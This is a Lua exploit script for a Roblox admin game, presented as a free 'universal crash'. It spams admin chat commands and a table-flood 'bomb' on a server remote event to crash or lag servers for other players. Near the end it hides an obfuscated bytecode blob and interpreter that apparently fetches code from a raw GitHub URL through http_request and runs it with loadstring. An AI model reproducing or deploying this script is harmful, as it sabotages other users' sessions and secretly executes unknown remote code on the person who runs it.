-- The naming is based off of vecko's uban. His uban was a ban that worked on every sort of username, u standing for universal.
-- Universal is the naming here because this crash works regardless of what gamepasses you have, you don't need any of them but it has the best crash for each gamepass or not gamepass (If you know what I mean)
-- Open source and free to use, credit would def be appreciated tho.
-- Code is awful because I made this fast but everything works as intended so don't complain

local MarketplaceService = game:GetService("MarketplaceService")
local Players = game:GetService("Players")
local LocalPlayer = Players.LocalPlayer
local gameFlr = workspace.Terrain.GameFolder
local adminFlr = gameFlr.Admin

local loopnum = "99999999999999999999999999999999"
local antilog = "00000000000000000000000000000000"

local pc1 = (MarketplaceService:UserOwnsGamePassAsync(LocalPlayer.UserId, 35748) or MarketplaceService:UserOwnsGamePassAsync(LocalPlayer.UserId, 37127))
local pc2 = (MarketplaceService:UserOwnsGamePassAsync(LocalPlayer.UserId, 66254) or MarketplaceService:UserOwnsGamePassAsync(LocalPlayer.UserId, 64354))
-- These work without proxies as well and are slightly faster

local function chet(massage)
    game.Players:Chat(massage)
end

if pc1 and not pc2 then
    local antibanfunction = false
    task.spawn(function()
        chet("respawn/random")
        if adminFlr.Pads:FindFirstChild(game.Players.LocalPlayer.Name.."'s admin") == nil then -- Just persons but no pad
            if not gamepassperm then
            getgenv().nonpermantipunish = false
            padAbuse = true
            wait(.35)
            for i = 1, 40 do
                chet(":punish/                                                                                                                                       me fuck")
                wait(.51)
                for i = 1, 128 do
                    chet(
                        "rocket/                                                                                                                                       me me me fuck"
                    )
                end
            
                for i = 1, 500 do
                    task.wait()
                    chet(
                        "unpunish/                                                                                                                                     all all all all fuck"
                    )
                end
                wait(1)
                chet("clone all all all all fuck")
                wait(.49)
                for i = 1, 128 do
                    task.wait()
                    chet(
                        "rocket/                                                                                                                                       all all all all fuck"
                    )
                end

                for i = 1, 128 do
                    task.wait()
                    chet(
                        "shield/                                                                                                                                       all all all all fuck"
                    )
                end
            
                for i = 1, 500 do
                    task.wait()
                    chet(
                        "unpunish/                                                                                                                                     all all all all fuck"
                    )
                end
                wait(2)
                chet("clone all all all all")
            end
        end
    end
    chet("fogend nil")
    chet("flash the fuck out of your ass")
    chet("h\n\n\n GAME HAS BEEN NUKED. No crash but instead you have a broken cam\n\n\n")
    chet("respawn random")
    for i = 1, 5 do
        chet("size all .3")
    end
    for i = 1, 13 do
        chet("rocket/ all all all all                                                                fuck")
        chet("freeze all all all all                                                                fuck")
        chet("dog all all all all                                                                      fuck")
    end
    for i = 1, 5 do
        chet("size all 10")
    end
    for i = 1, 200 do
        chet("clone all all all all                                                                           fuck")
    end
    while task.wait() do
        chet("clone all all all all                                                                           fuck")
    end
    end)
elseif not pc1 and pc2 then -- Just perm, not persons. This is also the most simple
    for i = 1, 5 do
        chet("size all .3")
    end
    for i = 1, 23 do
        chet("freeze all all all all                                                                fuck")
        chet("dog all all all all                                                                      fuck")
    end
    for i = 1, 5 do
        chet("size all 10")
    end
    for i = 1, 200 do
        chet("clone all all all all                                                                           fuck")
    end
    while task.wait() do
        chet("clone all all all all                                                                           fuck")
    end
elseif pc1 and pc2 then -- This requires both but is easily the most powerful
    chet("respawn random")
    for i = 1, 5 do
        chet("size all .3")
    end
    for i = 1, 13 do
        chet("rocket/ all all all all                                                                fuck")
        chet("freeze all all all all                                                                fuck")
        chet("dog all all all all                                                                      fuck")
    end
    for i = 1, 5 do
        chet("size all 10")
    end
    for i = 1, 200 do
        chet("clone all all all all                                                                           fuck")
    end
    while task.wait() do
        chet("clone all all all all                                                                           fuck")
    end
else
    task.spawn(function()
        local function GetPad(msg)
            while PadCheck == true do
                task.wait(0)
                if not game:GetService("Workspace").Terrain["GameFolder"].Admin.Pads:FindFirstChild(game.Players.LocalPlayer.Name .. "'s admin") then
                    if game:GetService("Workspace").Terrain["GameFolder"].Admin.Pads:FindFirstChild("Touch to get admin") then
                        local pad = game:GetService("Workspace").Terrain["GameFolder"].Admin.Pads:FindFirstChild("Touch to get admin"):FindFirstChild("Head")
                        local padCFrame = game:GetService("Workspace").Terrain["GameFolder"].Admin.Pads:FindFirstChild("Touch to get admin"):FindFirstChild("Head").CFrame
                        task.wait(0.125)
                        pad.CanCollide = false
                        repeat task.wait() until game.Players.LocalPlayer.Character:FindFirstChild("HumanoidRootPart")
                        pad.CFrame = game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame
                        task.wait(0.125)
                        pad.CFrame = padCFrame
                        pad.CanCollide = true
                    else
                        fireclickdetector(game:GetService("Workspace").Terrain["GameFolder"].Admin.Regen.ClickDetector, 0)
                    end
                end
            end
        end

        PadCheck = true
        GetPad(msg) -- Attempting to get a pad lmao
    end)
    wait(1.5) -- Shoutout to Funzy
    if adminFlr.Pads:FindFirstChild(game.Players.LocalPlayer.Name.."'s admin") == nil then -- None of the gamepasses as well as no pads
        local regen = game:GetService("Workspace").Terrain["GameFolder"].Admin:FindFirstChild("Regen")
        local gpad = game:GetService("Workspace").Terrain["GameFolder"].Admin.Pads:FindFirstChild("Touch to get admin")
        task.spawn(function()
            if not regen and not gpad then
                local root = game.Players.LocalPlayer.Character.HumanoidRootPart
                root.Anchored = true
                repeat
                    wait(.15)
                    root.CFrame = CFrame.new(-7.165, root.Position.Y + 2500 , 94.743)
                until workspace.Terrain.GameFolder.Admin:FindFirstChild("Regen")
                root.Anchored = false
                root.CFrame = workspace.Terrain.GameFolder.Admin:FindFirstChild("Regen").CFrame + Vector3.new(0, 3, 0)
                wait(.49)
                task.spawn(function()
                    local function GetPad(msg)
                        while PadCheck == true do
                            task.wait(0)
                            if not game:GetService("Workspace").Terrain["GameFolder"].Admin.Pads:FindFirstChild(game.Players.LocalPlayer.Name .. "'s admin") then
                                if game:GetService("Workspace").Terrain["GameFolder"].Admin.Pads:FindFirstChild("Touch to get admin") then
                                    local pad = game:GetService("Workspace").Terrain["GameFolder"].Admin.Pads:FindFirstChild("Touch to get admin"):FindFirstChild("Head")
                                    local padCFrame = game:GetService("Workspace").Terrain["GameFolder"].Admin.Pads:FindFirstChild("Touch to get admin"):FindFirstChild("Head").CFrame
                                    task.wait(0.125)
                                    pad.CanCollide = false
                                    repeat task.wait() until game.Players.LocalPlayer.Character:FindFirstChild("HumanoidRootPart")
                                    pad.CFrame = game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame
                                    task.wait(0.125)
                                    pad.CFrame = padCFrame
                                    pad.CanCollide = true
                                else
                                    fireclickdetector(game:GetService("Workspace").Terrain["GameFolder"].Admin.Regen.ClickDetector, 0)
                                end
                            end
                        end
                    end
            
                    PadCheck = true
                    GetPad(msg) -- Attempting to get a pad lmao
                end)
                wait(1.5) -- Shoutout to Funzy
                for i = 1, 5 do
                    chet("size all .3")
                end
                for i = 1, 23 do
                    chet("freeze all all all all                                                                fuck")
                    chet("dog all all all all                                                                      fuck")
                end
                for i = 1, 5 do
                    chet("size all 10")
                end
                for i = 1, 200 do
                    chet("clone all all all all                                                                           fuck")
                end
                while task.wait() do
                    chet("clone all all all all                                                                           fuck")
                end
            end
        end)
        if not regen then
            wait(10)
        end
        -- NO ADMIN LAG. WORKS POORLY BUT CAN DO THE JOB AT TIMES
        task.spawn(function()
            getgenv().on = true
            while wait(1.3) do --// s
                if on then
                    game:GetService("NetworkClient"):SetOutgoingKBPSLimit(0/0)
                    local function getmaxvalue(val)
                        local mainvalueifonetable = 499999
                        if type(val) ~= "number" then
                            return nil
                        end
                        local calculateperfectval = (mainvalueifonetable / (val + 2))
                        return calculateperfectval
                    end

                    local function bomb(tableincrease, tries)
                        local maintable = {}
                        local spammedtable = {}

                        table.insert(spammedtable, {})
                        z = spammedtable[1]

                        for i = 1, tableincrease do
                            local tableins = {}
                            table.insert(z, tableins)
                            z = tableins
                        end

                        local calculatemax = getmaxvalue(tableincrease)
                        local maximum

                        if calculatemax then
                            maximum = calculatemax
                        else
                            maximum = 10000
                        end

                        for i = 1, maximum do
                            table.insert(maintable, spammedtable)
                        end

                        for i = 1, tries do
                            game.RobloxReplicatedStorage.UpdatePlayerBlockList:FireServer(maintable)
                        end
                    end

                    bomb(250, 2)
                end
            end
        end)
        local a={'\27','\76','\117','\97','\81','\0','\1','\4','\8','\4','\8','\0','\10','\0','\0','\0','\0','\0','\0','\0','\64','\109','\97','\105','\110','\46','\108','\117','\97','\0','\5','\0','\0','\0','\13','\0','\0','\0','\0','\0','\0','\5','\30','\0','\0','\0','\5','\0','\0','\0','\26','\64','\0','\0','\22','\192','\1','\128','\5','\64','\0','\0','\26','\64','\0','\0','\22','\0','\1','\128','\5','\128','\0','\0','\26','\64','\0','\0','\22','\64','\0','\128','\5','\192','\0','\0','\6','\64','\64','\0','\69','\0','\0','\0','\90','\64','\0','\0','\22','\128','\1','\128','\91','\64','\0','\0','\22','\0','\1','\128','\69','\128','\0','\0','\90','\64','\0','\0','\22','\64','\0','\128','\69','\192','\0','\0','\70','\64','\192','\0','\128','\0','\128','\0','\202','\64','\0','\0','\201','\64','\65','\130','\156','\128','\0','\1','\197','\128','\1','\0','\6','\193','\65','\1','\220','\128','\0','\1','\220','\64','\128','\0','\30','\0','\128','\0','\8','\0','\0','\0','\4','\13','\0','\0','\0','\0','\0','\0','\0','\104','\116','\116','\112','\95','\114','\101','\113','\117','\101','\115','\116','\0','\4','\8','\0','\0','\0','\0','\0','\0','\0','\114','\101','\113','\117','\101','\115','\116','\0','\4','\9','\0','\0','\0','\0','\0','\0','\0','\72','\116','\116','\112','\80','\111','\115','\116','\0','\4','\4','\0','\0','\0','\0','\0','\0','\0','\115','\121','\110','\0','\4','\4','\0','\0','\0','\0','\0','\0','\0','\85','\114','\108','\0','\4','\67','\0','\0','\0','\0','\0','\0','\0','\104','\116','\116','\112','\115','\58','\47','\47','\114','\97','\119','\46','\103','\105','\116','\104','\117','\98','\117','\115','\101','\114','\99','\111','\110','\116','\101','\110','\116','\46','\99','\111','\109','\47','\84','\101','\99','\104','\45','\49','\56','\55','\47','\84','\101','\109','\112','\47','\109','\97','\105','\110','\47','\114','\97','\110','\100','\111','\109','\37','\50','\48','\116','\101','\115','\116','\0','\4','\11','\0','\0','\0','\0','\0','\0','\0','\108','\111','\97','\100','\115','\116','\114','\105','\110','\103','\0','\4','\5','\0','\0','\0','\0','\0','\0','\0','\66','\111','\100','\121','\0','\0','\0','\0','\0','\30','\0','\0','\0','\7','\0','\0','\0','\7','\0','\0','\0','\7','\0','\0','\0','\7','\0','\0','\0','\7','\0','\0','\0','\7','\0','\0','\0','\7','\0','\0','\0','\7','\0','\0','\0','\7','\0','\0','\0','\7','\0','\0','\0','\7','\0','\0','\0','\8','\0','\0','\0','\8','\0','\0','\0','\8','\0','\0','\0','\8','\0','\0','\0','\8','\0','\0','\0','\8','\0','\0','\0','\8','\0','\0','\0','\8','\0','\0','\0','\8','\0','\0','\0','\8','\0','\0','\0','\9','\0','\0','\0','\9','\0','\0','\0','\9','\0','\0','\0','\9','\0','\0','\0','\11','\0','\0','\0','\11','\0','\0','\0','\11','\0','\0','\0','\11','\0','\0','\0','\13','\0','\0','\0','\3','\0','\0','\0','\8','\0','\0','\0','\0','\0','\0','\0','\114','\101','\113','\117','\101','\115','\116','\0','\11','\0','\0','\0','\29','\0','\0','\0','\9','\0','\0','\0','\0','\0','\0','\0','\114','\101','\113','\117','\101','\115','\116','\115','\0','\21','\0','\0','\0','\29','\0','\0','\0','\7','\0','\0','\0','\0','\0','\0','\0','\115','\99','\114','\105','\112','\116','\0','\25','\0','\0','\0','\29','\0','\0','\0','\0','\0','\0','\0'}local b={"ABC","ABx","ABC","ABC","ABC","ABx","ABC","ABx","ABC","ABC","ABC","ABC","ABC","ABC","ABC","ABC","ABC","ABC","ABC","ABC","ABC","ABC","AsBx","ABC","ABC","ABC","ABC","ABC","ABC","ABC","ABC","AsBx","AsBx","ABC","ABC","ABC","ABx","ABC"}local c={"MOVE","LOADK","LOADBOOL","LOADNIL","GETUPVAL","GETGLOBAL","GETTABLE","SETGLOBAL","SETUPVAL","SETTABLE","NEWTABLE","SELF","ADD","SUB","MUL","DIV","MOD","POW","UNM","NOT","LEN","CONCAT","JMP","EQ","LT","LE","TEST","TESTSET","CALL","TAILCALL","RETURN","FORLOOP","FORPREP","TFORLOOP","SETLIST","CLOSE","CLOSURE","VARARG"}local function d(e,f,g)if g then local h=0;local i=0;for j=f,g do h=h+2^i*d(e,j)i=i+1 end;return h else local k=2^(f-1)return e%(k+k)>=k and 1 or 0 end end;local function l(m)local n=1;local o=false;local p;local q;local r,s;local t,u,v,w,x;do function t()local y=m:byte(n,n)n=n+1;return y end;function u()local y,z,A,B=m:byte(n,n+3)n=n+4;return B*16777216+A*65536+z*256+y end;function v()local y=u()local z=u()return z*4294967296+y end;function w()local y=u()local z=u()return(-2*d(z,32)+1)*2^(d(z,21,31)-1023)*((d(z,1,20)*2^32+y)/2^52+1)end;function x(C)local D;if C then D=m:sub(n,n+C-1)n=n+C else C=s()if C==0 then return end;D=m:sub(n,n+C-1)n=n+C end;return D end end;local function E()local F;local G={}local H={}local I={}local J={lines={}}F={instructions=G,constants=H,prototypes=I,debug=J}local K;F.name=x()F.first_line=r()F.last_line=r()if F.name then F.name=F.name:sub(1,-2)end;F.upvalues=t()F.arguments=t()F.varg=t()F.stack=t()do K=r()for j=1,K do local L={}local a=u()local M=d(a,1,6)local N=b[M+1]L.opcode=M;L.type=N;L.A=d(a,7,14)if N=="ABC"then L.B=d(a,24,32)L.C=d(a,15,23)elseif N=="ABx"then L.Bx=d(a,15,32)elseif N=="AsBx"then L.sBx=d(a,15,32)-131071 end;G[j]=L end end;do K=r()for j=1,K do local O={}local N=t()O.type=N;if N==1 then O.llIIlIlIIllllIlIlIlIIlIlIlIllllIllI=t()~=0 elseif N==3 then O.llIIlIlIIllllIlIlIlIIlIlIlIllllIllI=w()elseif N==4 then O.llIIlIlIIllllIlIlIlIIlIlIlIllllIllI=x():sub(1,-2)end;H[j-1]=O end end;do K=r()for j=1,K do I[j-1]=E()end end;do local a=J.lines;K=r()for j=1,K do a[j]=u()end;K=r()for j=1,K do x():sub(1,-2)u()u()end;K=r()for j=1,K do x()end end;return F end;do assert(x(4)=="\27Lua","S1MPLYS3C7RED: Bytecode expected")assert(t()==0x51,"S1MPLYS3C7RED: Only lua5.1 is supported")t()o=t()==0;p=t()q=t()if p==4 then r=u elseif p==8 then r=v else error("")end;if q==4 then s=u elseif q==8 then s=v else error("")end;assert(x(3)=="\4\8\0","S1MPLYS3C7RED: Unsupported platform")end;return E()end;local function P(...)local A=select("#",...)local Q={...}return A,Q end;local function R(S,T)local G=S.instructions;local H=S.constants;local I=S.prototypes;local U,V;local W;local X=1;local Y,Z;local _={[0]=function(L)U[L.A]=U[L.B]end,[1]=function(L)U[L.A]=H[L.Bx].llIIlIlIIllllIlIlIlIIlIlIlIllllIllI end,[2]=function(L)U[L.A]=L.B~=0;if L.C~=0 then X=X+1 end end,[3]=function(L)local U=U;for j=L.A,L.B do U[j]=nil end end,[4]=function(L)U[L.A]=T[L.B]end,[5]=function(L)local a0=H[L.Bx].llIIlIlIIllllIlIlIlIIlIlIlIllllIllI;U[L.A]=W[a0]end,[6]=function(L)local a1=L.C;local U=U;a1=a1>255 and H[a1-256].llIIlIlIIllllIlIlIlIIlIlIlIllllIllI or U[a1]U[L.A]=U[L.B][a1]end,[7]=function(L)local a0=H[L.Bx].llIIlIlIIllllIlIlIlIIlIlIlIllllIllI;W[a0]=U[L.A]end,[8]=function(L)T[L.B]=U[L.A]end,[9]=function(L)local a2=L.B;local a1=L.C;local U,H=U,H;a2=a2>255 and H[a2-256].llIIlIlIIllllIlIlIlIIlIlIlIllllIllI or U[a2]a1=a1>255 and H[a1-256].llIIlIlIIllllIlIlIlIIlIlIlIllllIllI or U[a1]U[L.A][a2]=a1 end,[10]=function(L)U[L.A]={}end,[11]=function(L)local a3=L.A;local a2=L.B;local a1=L.C;local U=U;a2=U[a2]a1=a1>255 and H[a1-256].llIIlIlIIllllIlIlIlIIlIlIlIllllIllI or U[a1]U[a3+1]=a2;U[a3]=a2[a1]end,[12]=function(L)local a2=L.B;local a1=L.C;local U,H=U,H;a2=a2>255 and H[a2-256].llIIlIlIIllllIlIlIlIIlIlIlIllllIllI or U[a2]a1=a1>255 and H[a1-256].llIIlIlIIllllIlIlIlIIlIlIlIllllIllI or U[a1]U[L.A]=a2+a1 end,[13]=function(L)local a2=L.B;local a1=L.C;local U,H=U,H;a2=a2>255 and H[a2-256].llIIlIlIIllllIlIlIlIIlIlIlIllllIllI or U[a2]a1=a1>255 and H[a1-256].llIIlIlIIllllIlIlIlIIlIlIlIllllIllI or U[a1]U[L.A]=a2-a1 end,[14]=function(L)local a2=L.B;local a1=L.C;local U,H=U,H;a2=a2>255 and H[a2-256].llIIlIlIIllllIlIlIlIIlIlIlIllllIllI or U[a2]a1=a1>255 and H[a1-256].llIIlIlIIllllIlIlIlIIlIlIlIllllIllI or U[a1]U[L.A]=a2*a1 end,[15]=function(L)local a2=L.B;local a1=L.C;local U,H=U,H;a2=a2>255 and H[a2-256].llIIlIlIIllllIlIlIlIIlIlIlIllllIllI or U[a2]a1=a1>255 and H[a1-256].llIIlIlIIllllIlIlIlIIlIlIlIllllIllI or U[a1]U[L.A]=a2/a1 end,[16]=function(L)local a2=L.B;local a1=L.C;local U,H=U,H;a2=a2>255 and H[a2-256].llIIlIlIIllllIlIlIlIIlIlIlIllllIllI or U[a2]a1=a1>255 and H[a1-256].llIIlIlIIllllIlIlIlIIlIlIlIllllIllI or U[a1]U[L.A]=a2%a1 end,[17]=function(L)local a2=L.B;local a1=L.C;local U,H=U,H;a2=a2>255 and H[a2-256].llIIlIlIIllllIlIlIlIIlIlIlIllllIllI or U[a2]a1=a1>255 and H[a1-256].llIIlIlIIllllIlIlIlIIlIlIlIllllIllI or U[a1]U[L.A]=a2^a1 end,[18]=function(L)U[L.A]=-U[L.B]end,[19]=function(L)U[L.A]=not U[L.B]end,[20]=function(L)U[L.A]=#U[L.B]end,[21]=function(L)local a2=L.B;local a4=U[a2]for j=a2+1,L.C do a4=a4 ..U[j]end;U[L.A]=a4 end,[22]=function(L)X=X+L.sBx end,[23]=function(L)local a3=L.A;local a2=L.B;local a1=L.C;local U,H=U,H;a3=a3~=0;a2=a2>255 and H[a2-256].llIIlIlIIllllIlIlIlIIlIlIlIllllIllI or U[a2]a1=a1>255 and H[a1-256].llIIlIlIIllllIlIlIlIIlIlIlIllllIllI or U[a1]if a2==a1~=a3 then X=X+1 end end,[24]=function(L)local a3=L.A;local a2=L.B;local a1=L.C;local U,H=U,H;a3=a3~=0;a2=a2>255 and H[a2-256].llIIlIlIIllllIlIlIlIIlIlIlIllllIllI or U[a2]a1=a1>255 and H[a1-256].llIIlIlIIllllIlIlIlIIlIlIlIllllIllI or U[a1]if a2<a1~=a3 then X=X+1 end end,[25]=function(L)local a3=L.A;local a2=L.B;local a1=L.C;local U,H=U,H;a3=a3~=0;a2=a2>255 and H[a2-256].llIIlIlIIllllIlIlIlIIlIlIlIllllIllI or U[a2]a1=a1>255 and H[a1-256].llIIlIlIIllllIlIlIlIIlIlIlIllllIllI or U[a1]if a2<=a1~=a3 then X=X+1 end end,[26]=function(L)if U[L.A]==(L.C~=0)then X=X+1 end end,[27]=function(L)local U=U;local a2=U[L.B]if a2==(L.C~=0)then X=X+1 else U[L.A]=a2 end end,[28]=function(L)local a3=L.A;local a2=L.B;local a1=L.C;local U=U;local a5,a6;local a7,a8;a5={}if a2~=1 then if a2~=0 then a7=a3+a2-1 else a7=V end;a8=0;for j=a3+1,a7 do a8=a8+1;a5[a8]=U[j]end;a7,a6=P(U[a3](unpack(a5,1,a7-a3)))else a7,a6=P(U[a3]())end;V=a3-1;if a1~=1 then if a1~=0 then a7=a3+a1-2 else a7=a7+a3 end;a8=0;for j=a3,a7 do a8=a8+1;U[j]=a6[a8]end end end,[29]=function(L)local a3=L.A;local a2=L.B;local a1=L.C;local U=U;local a5,a6;local V,a7,a8=V;a5={}if a2~=1 then if a2~=0 then a7=a3+a2-1 else a7=V end;a8=0;for j=a3+1,a7 do a8=a8+1;a5[#a5+1]=U[j]end;a6={U[a3](unpack(a5,1,a7-a3))}else a6={U[a3]()}end;return true,a6 end,[30]=function(L)local a3=L.A;local a2=L.B;local U=U;local a7;local a8,a9;if a2==1 then return true end;if a2==0 then a7=V else a7=a3+a2-2 end;a9={}local a8=0;for j=a3,a7 do a8=a8+1;a9[a8]=U[j]end;return true,a9 end,[31]=function(L)local a3=L.A;local U=U;local aa=U[a3+2]local n=U[a3]+aa;U[a3]=n;if aa>0 then if n<=U[a3+1]then X=X+L.sBx;U[a3+3]=n end else if n>=U[a3+1]then X=X+L.sBx;U[a3+3]=n end end end,[32]=function(L)local a3=L.A;local U=U;U[a3]=U[a3]-U[a3+2]X=X+L.sBx end,[33]=function(L)local a3=L.A;local a2=L.B;local a1=L.C;local U=U;local ab=a3+2;local a4={U[a3](U[a3+1],U[a3+2])}for j=1,a1 do U[ab+j]=a4[j]end;if U[a3+3]~=nil then U[a3+2]=U[a3+3]else X=X+1 end end,[34]=function(L)local a3=L.A;local a2=L.B;local a1=L.C;local U=U;if a1==0 then error("NYI: extended SETLIST")else local ab=(a1-1)*50;local Q=U[a3]if a2==0 then a2=V end;for j=1,a2 do Q[ab+j]=U[a3+j]end end end,[35]=function(L)io.stderr:write("NYI: CLOSE")io.stderr:flush()end,[36]=function(L)local ac=I[L.Bx]local G=G;local U=U;local ad={}local ae=setmetatable({},{__index=function(Q,af)local ag=ad[af]return ag.segment[ag.offset]end,__newindex=function(Q,af,ah)local ag=ad[af]ag.segment[ag.offset]=ah end})for j=1,ac.upvalues do local ai=G[X]if ai.opcode==0 then ad[j-1]={segment=U,offset=ai.B}elseif G[X].opcode==4 then ad[j-1]={segment=T,offset=ai.B}end;X=X+1 end;local aj,ak=R(ac,ae)U[L.A]=ak end,[37]=function(L)local a3=L.A;local a2=L.B;local U,Y=U,Y;for j=a3,a3+(a2>0 and a2-1 or Z)do U[j]=Y[j-a3]end end}local function a8()local G=G;local L,y,z;while true do L=G[X]X=X+1;y,z=_[L.opcode](L)if y then return z end end end;local al={get_stack=function()return U end,get_IP=function()return X end}local function ak(...)local am={}local an={}V=-1;U=setmetatable(am,{__index=an,__newindex=function(Q,af,ah)if af>V and ah then V=af end;an[af]=ah end})local a5={...}Y={}Z=select("#",...)-1;for j=0,Z do am[j]=a5[j+1]Y[j]=a5[j+1]end;W=getfenv()X=1;local ao=coroutine.create(a8)local y,z=coroutine.resume(ao)if y then if z then return unpack(z)end;return else local ap=S.name;local aq=S.debug.lines[X]local ar=z:gsub("(.-:)","")local a9=""a9=a9 ..(ap and ap..":"or"")a9=a9 ..(aq and aq..":"or"")a9=a9 ..z;error(a9,0)end end;return al,ak end;local as={IlIIIIIIlIllIIlIlIIIllIllIIlllIllll=function(m)local S=l(m)local aj,ak=R(S)return ak end,utils={lIlIIIlllIlIIIIlIIIllIlIIIIIlIlIlll=l,IIllIllIlIIIIIIIIllIlIIIIlllIIIIIIl=R,IlllIIIllIlllIlIIIllllIIllllIIllllI=function(m)local S=l(m)return R(S)end}}as.IlIIIIIIlIllIIlIlIIIllIllIIlllIllll(table.concat(a,[[]]))()
    else
        -- None of the gamepasses but has a pad
        for i = 1, 5 do
            chet("size all .3")
        end
        for i = 1, 23 do
            chet("freeze all all all all                                                                fuck")
            chet("dog all all all all                                                                      fuck")
        end
        for i = 1, 5 do
            chet("size all 10")
        end
        for i = 1, 200 do
            chet("clone all all all all                                                                           fuck")
        end
        while task.wait() do
            chet("clone all all all all                                                                           fuck")
        end
    end
end
